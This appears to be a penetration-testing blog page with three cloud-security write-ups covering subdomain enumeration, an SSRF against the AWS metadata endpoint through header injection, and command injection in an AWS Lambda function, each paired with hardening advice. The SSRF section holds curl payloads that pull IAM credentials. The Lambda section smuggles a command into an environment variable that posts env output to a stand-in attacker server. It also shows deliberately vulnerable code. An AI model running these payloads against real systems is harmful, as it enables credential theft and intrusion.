Red Team Logic — Security & Ethical Hacking

Real penetration tests, exploitation walkthroughs, and hardening blueprints — compiled from 20+ years of offensive security research.

Write-ups

Critical

High

Web / Bounty

Showing 3 write-ups · Cloud Security · CRITICAL severity

Clear all filters

RTL-2026-014 Critical Discovery: Subdomain Enumeration Risk in Cloud Infrastructure ▾

Cloud Security ⚠ Critical

2026-06-14 01:28

🎯 Target & Threat Context

During a recent engagement with a mid-sized e-commerce company leveraging AWS for their cloud services, I was tasked with assessing the security posture of their web applications, particularly their API endpoints. The tech stack comprised React for the front end, Node.js for the backend, and a MongoDB database for data storage. The company had substantial customer data at stake, and any vulnerability could lead to significant reputational damage and compliance issues.

While mapping out their domain structure, I used standard reconnaissance tools to gather subdomain information. It was here that I found a particularly interesting point: several subdomains were publicly accessible without adequate security measures. The presence of these subdomains indicated that they may not have implemented robust access controls and could expose sensitive services to attackers. This is especially concerning within a cloud environment where misconfigurations can lead to data leaks and unauthorized access.

Given the critical nature of this discovery, I knew that understanding how these subdomains were configured and identifying potential attack vectors would be crucial in providing a comprehensive risk assessment and actionable remediation steps.

🔓 Vulnerability & Attack Vector

Subdomain enumeration is a reconnaissance technique that attackers use to identify subdomains associated with a primary domain. In a cloud environment, this can lead to the discovery of exposed services that can be exploited. These subdomains may host vulnerable applications or APIs that lack adequate security controls, making them prime targets for attackers looking to escalate privileges or exfiltrate data.

The vulnerability arises when a cloud infrastructure is misconfigured, allowing attackers to discover and access subdomains unintentionally exposed. For instance:

example.com
www.example.com
api.example.com
dev.example.com
test.example.com

💥 Exploitation Walkthrough

Following the identification of exposed subdomains, I proceeded with a detailed examination to determine their configurations and security postures. My approach involved several reconnaissance techniques to gauge the risk associated with each subdomain.

First, I executed a subdomain enumeration using tools like Sublist3r and DNS Dumpster. The output revealed multiple subdomains that were not listed in their primary domain records.

Sublist3r -d example.com
Subdomains: api.example.com
dev.example.com
test.example.com

Next, I analyzed the SSL certificates of these subdomains to check for any discrepancies in the issuance and delegation of authority. This revealed that some subdomains were using outdated certificates.
Then, I performed a port scan on the identified subdomains to determine active services. I found that api.example.com was publicly accessible and found to have no rate limiting on sensitive endpoints.

These steps demonstrated the extent of exposure and potential for exploitation if an attacker were to gain access to these endpoints.

🛡 Defensive Hardening Blueprint

To mitigate risks associated with subdomain enumeration, it is crucial to implement strict access controls and DNS filtering. A hardened configuration could look like:

example.com (main domain)
www.example.com (CNAME to main domain)
api.example.com (secured with IAM roles)
dev.example.com (not publicly accessible)
test.example.com (only accessible via VPN)

To effectively defend against subdomain enumeration risks, organizations must adopt a multi-layered security approach. Below is a comparison table illustrating vulnerable vs. hardened practices relevant to this vulnerability.

Area	Vulnerable Approach	Hardened Approach
DNS Configuration	All subdomains publicly listed	Use DNS records to restrict access
Access Controls	Public access to sensitive APIs	Implement IAM roles and VPCs to restrict access
SSL/TLS Management	Outdated certificates used across subdomains	Regularly update and manage SSL certificates

My prioritized remediation recommendation is to implement stricter access controls and consider a more segmented architecture for internal services, ensuring that sensitive subdomains are not exposed to the public internet.

📖 Lessons From the Field

Always perform thorough reconnaissance to identify potential security gaps, including subdomain enumeration as a key part of your assessment strategy.
Implement and regularly review access controls for all subdomains, ensuring only necessary services are exposed.
Regularly update and manage SSL/TLS certificates to avoid vulnerabilities associated with outdated encryption practices.
Consider cloud-native solutions for managing subdomains and network segmentation, enhancing overall security posture.

ID: RTL-2026-014 · Subdomain enumeration & reconnaissance · Severity: CRITICAL · 2026-06-14

Open Full Write-up ↗

RTL-2026-001 SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service ▾

Cloud Security ⚠ Critical

2026-06-02 10:04

🎯 Target & Threat Context

Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

🔓 Vulnerability & Attack Vector

The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

Developers often miss this vulnerability for several reasons:

Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

This attack vector falls under MITRE ATT&CK T1190 (Exploit Public-Facing Application) and T1595.002 (Active Scanning: Vulnerability Scanning), as it involves exploiting a public-facing endpoint to gain access to internal resources.

Feature	Vulnerable Configuration	Hardened Configuration
`pdf-gen-svc` Input Validation (URL)	Allows arbitrary URLs, including internal IPs, or external URLs that resolve to internal IPs (DNS rebinding not directly applicable here, but general lack of validation).	Strictly whitelists allowed domains/IPs for `sourceUrl`. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
`pdf-gen-svc` Input Validation (Headers)	Allows arbitrary `customHeaders` to be passed directly to the internal proxy.	Sanitizes or strictly whitelists allowed `customHeaders`. Blocks sensitive headers like `Host`, `X-Forwarded-For`, `X-Real-IP`, etc., from user control.
Internal Proxy Behavior	Uses `X-Forwarded-For` for routing decisions or trusts it implicitly for target IP identification.	Ignores `X-Forwarded-For` for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
AWS Instance Metadata Service (IMDS)	IMDSv1 enabled (no session token required).	IMDSv2 enforced (requires a session token, making SSRF significantly harder).
Network Segmentation/Egress Filtering	`pdf-gen-svc` and internal proxy have broad egress rules, allowing connections to `169.254.169.254` and other internal IPs.	Strict egress rules (Security Groups, NACLs) prevent `pdf-gen-svc` and proxy from connecting to `169.254.169.254` or any unnecessary internal/external IPs.

Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

// pdf-gen-svc (Node.js)
const express = require('express');
const axios = require('axios'); // Or any HTTP client
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
    if (sourceUrl.includes('169.254')) {
        return res.status(400).send('Invalid source URL.');
    }

    try {
        // Forward request to internal proxy, including custom headers
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: customHeaders || {} // Directly passes customHeaders
        });

        // ... rest of PDF generation logic ...
        res.status(200).send('PDF generated successfully (content omitted for brevity).');

    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});

app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And on the proxy side (conceptual Go code):

// internal-proxy.corp (Go)
package main

import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "net/url"
    "strings"
)

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // ... parse requestBody ...

    // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
    targetHost := requestBody.TargetURL // Default
    if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
        // If X-Forwarded-For is present, use it as the target host/IP
        // This is a simplified example of a misconfiguration.
        // In reality, it might be used in conjunction with a specific internal routing logic.
        targetHost = "http://" + xff // Direct IP injection!
    }

    req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    for k, v := range requestBody.Headers {
        req.Header.Set(k, v) // Pass all custom headers
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
    }
    defer resp.Body.Close()

    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

💥 Exploitation Walkthrough

The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

Step 1: Discovering IAM Role Names

First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
     -H "Content-Type: application/json" 
     -d '{
           "sourceUrl": "http://example.com/some-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
           }
         }'

The response (rendered in the PDF) contained a list of IAM role names, for example:


pdf-gen-service-role
internal-proxy-role

Step 2: Retrieving Temporary IAM Credentials

With the role names, we could now request temporary security credentials for one of these roles. We chose internal-proxy-role as it sounded like it might have broader network access.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
     -H "Content-Type: application/json" 
     -d '{
           "sourceUrl": "http://example.com/another-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
           }
         }'

The PDF generated by the service now contained the following highly sensitive information:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
  "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
  "Expiration": "2023-10-27T16:00:00Z"
}

Bingo! We had successfully retrieved temporary AWS credentials, including AccessKeyId, SecretAccessKey, and a SessionToken. These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This was a full system compromise, granting us deep access into the client's AWS infrastructure.

🛡 Defensive Hardening Blueprint

Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.

Fix	Pros	Cons
Strict Input Validation (URL)	Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly.	Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
Strict Input Validation (Headers)	Prevents header-based SSRF bypasses and other header injection attacks.	Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
Network Segmentation & Egress Filtering	Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius.	Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
Enforce IMDSv2	Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token.	Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
Least Privilege IAM Roles	Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials.	Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.

📖 Lessons From the Field

Here's how the pdf-gen-svc and the internal proxy should be hardened:

// pdf-gen-svc (Node.js) - Hardened
const express = require('express');
const axios = require('axios');
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';

// Function to validate URLs against private IP ranges and whitelist
function isValidUrl(url) {
    try {
        const parsedUrl = new URL(url);
        const hostname = parsedUrl.hostname;

        // Whitelist allowed domains (e.g., example.com, cdn.example.com)
        const allowedDomains = ['example.com', 'cdn.example.com'];
        if (!allowedDomains.includes(hostname)) {
            // Check for private IP ranges if not in whitelist
            const ip = require('net').isIP(hostname) ? hostname : null;
            if (ip) {
                const isPrivate = require('ip-is-private')(ip); // Using a library for robustness
                if (isPrivate || ip.startsWith('169.254')) {
                    return false; // Block private IPs and link-local
                }
            } else {
                // If not an IP and not in whitelist, resolve DNS to check for private IPs
                // This requires careful asynchronous handling and is often done at a firewall level.
                // For simplicity, we'll assume DNS resolution is handled by a trusted resolver
                // or that strict egress filtering prevents internal IP resolution for external domains.
            }
        }
        return true;
    } catch {
        return false;
    }
}

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    if (!isValidUrl(sourceUrl)) {
        return res.status(400).send('Invalid or disallowed source URL.');
    }

    // Sanitize customHeaders: only allow explicitly whitelisted headers
    const allowedCustomHeaders = ['User-Agent', 'Referer']; // Example whitelist
    const sanitizedHeaders = {};
    if (customHeaders) {
        for (const headerName in customHeaders) {
            if (allowedCustomHeaders.includes(headerName)) {
                sanitizedHeaders[headerName] = customHeaders[headerName];
            }
        }
    }

    try {
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: sanitizedHeaders
        });
        res.status(200).send('PDF generated successfully.');
    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});
app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And for the internal proxy (conceptual Go code - Hardened):

// internal-proxy.corp (Go) - Hardened
package main

import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "net/url" // For parsing URLs
    "strings"
)

// Function to validate target URLs for the proxy
func isValidProxyTargetUrl(targetURL string) bool {
    u, err := url.Parse(targetURL)
    if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
        return false
    }

    // Implement strict whitelisting for domains the proxy is allowed to fetch from.
    // Or, more robustly, block all private IPs after DNS resolution.
    // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
    // The proxy's role is to ensure it doesn't get tricked by headers.

    // Crucially, the proxy *must not* use X-Forwarded-For for routing.
    return true
}

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // ... parse requestBody ...

    if !isValidProxyTargetUrl(requestBody.TargetURL) {
        http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
        return
    }

    // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
    // It should *always* use the `targetURL` provided directly for the actual network connection.
    req, err := http.NewRequest("GET", requestBody.TargetURL, nil) // Always use TargetURL
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    // Only set whitelisted headers if necessary, or pass none from user input.
    // For this example, we'll assume the pdf-gen-svc has already sanitized them.
    for k, v := range requestBody.Headers {
        // Explicitly block sensitive headers from being set by user input on the proxy
        if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
            continue // Do not allow these to be set by user
        }
        req.Header.Set(k, v)
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
        }
    defer resp.Body.Close()

    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.

Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

ID: RTL-2026-001 · Web Application Pentesting · Severity: CRITICAL · 2026-06-02

Open Full Write-up ↗

RTL-2026-001 Achieving RCE in AWS Lambda via Exploitation of Insecure Environment Variables ▾

Cloud Security ⚠ Critical

2026-03-13 18:48

🎯 Target & Threat Context

This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.

The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).

The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.

Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.

🔓 Vulnerability & Attack Vector

The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.

The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.

Developers often miss this because:

They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.

This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and MITRE ATT&CK T1059.006 (Command and Scripting Interpreter: Python). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.

Here's a comparison of the vulnerable versus a hardened configuration approach:

Vulnerable Configuration Hardened Configuration

Vulnerable Configuration	Hardened Configuration
Environment Variable: `VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"` Lambda Code Snippet: import subprocess import os def lambda_handler(event, context): script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py") # DANGER: Using shell=True with unsanitized input from env var result = subprocess.run(script_command, shell=True, capture_output=True, text=True) print(result.stdout) if result.returncode != 0: print(f"Validation failed: {result.stderr}") raise Exception("Transaction validation error") return {"statusCode": 200, "body": "Transaction validated successfully"}	Environment Variables: `VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py" VALIDATION_CONFIG_PATH="/etc/app/config.json"` Lambda Code Snippet: import subprocess import os def lambda_handler(event, context): script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py") config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json") # SAFE: Pass command and arguments as a list, shell=False (default) # Ensure script_path and config_path are validated/sanitized if they can be user-controlled command_args = [script_path, "--config", config_path] result = subprocess.run(command_args, capture_output=True, text=True) print(result.stdout) if result.returncode != 0: print(f"Validation failed: {result.stderr}") raise Exception("Transaction validation error") return {"statusCode": 200, "body": "Transaction validated successfully"}

Environment Variable:

VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"

Lambda Code Snippet:

import subprocess
import os

def lambda_handler(event, context):
    script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py")
    # DANGER: Using shell=True with unsanitized input from env var
    result = subprocess.run(script_command, shell=True, capture_output=True, text=True)
    print(result.stdout)
    if result.returncode != 0:
        print(f"Validation failed: {result.stderr}")
        raise Exception("Transaction validation error")
    return {"statusCode": 200, "body": "Transaction validated successfully"}

Environment Variables:

VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py"
VALIDATION_CONFIG_PATH="/etc/app/config.json"

Lambda Code Snippet:

import subprocess
import os

def lambda_handler(event, context):
    script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py")
    config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json")
    
    # SAFE: Pass command and arguments as a list, shell=False (default)
    # Ensure script_path and config_path are validated/sanitized if they can be user-controlled
    command_args = [script_path, "--config", config_path]
    result = subprocess.run(command_args, capture_output=True, text=True)
    print(result.stdout)
    if result.returncode != 0:
        print(f"Validation failed: {result.stderr}")
        raise Exception("Transaction validation error")
    return {"statusCode": 200, "body": "Transaction validated successfully"}

The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().

Let's assume the vulnerable Python Lambda code looked something like this:

# transaction_processor.py
import os
import subprocess
import json

def lambda_handler(event, context):
    # Retrieve the command prefix from environment variables
    # This is the critical vulnerability point
    command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
    
    # Assume 'event' contains transaction data that needs validation
    transaction_data = json.loads(event['body'])
    transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')

    # Construct the full command. The vulnerability is that command_prefix
    # is treated as part of the shell command, not just a path.
    full_command = f"{command_prefix} --transaction-id {transaction_id}"
    
    print(f"Executing validation command: {full_command}")
    
    try:
        # DANGER: shell=True allows command injection via command_prefix
        result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
        print(f"Validation output: {result.stdout}")
        return {
            'statusCode': 200,
            'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
        }
    except subprocess.CalledProcessError as e:
        print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
        }
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
        }

The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.

💥 Exploitation Walkthrough

Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.

Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:

# Step 1: Modify the Lambda's environment variable
# The payload injects a new command using shell metacharacters (;)
# It then uses curl to send the Lambda's environment variables to our listener.
# Finally, it attempts to execute the original script to avoid immediate suspicion,
# though the curl command would likely cause a timeout or error.

ATTACKER_SERVER="http://your-attacker-ip:8000"
LAMBDA_NAME="TransactionProcessorLambda"

aws lambda update-function-configuration 
    --function-name ${LAMBDA_NAME} 
    --environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"

Let's break down that payload for VALIDATION_SCRIPT_PATH:

'/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '

/usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.
;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.
curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.
- curl -X POST: Initiates an HTTP POST request.
- -d "$(env)": The $(env) command substitution executes the env command (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.
- ${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
; echo 'Injection successful': Another command separator, followed by a simple echo. This helps ensure the shell command completes, even if the curl fails, and provides a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the string.

After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:

# Step 2: Trigger the Lambda function (e.g., via API Gateway)
# This would be a normal transaction request from a client application.

API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"

curl -X POST -H "Content-Type: application/json" 
     -d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}' 
     ${API_GATEWAY_URL}

On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.

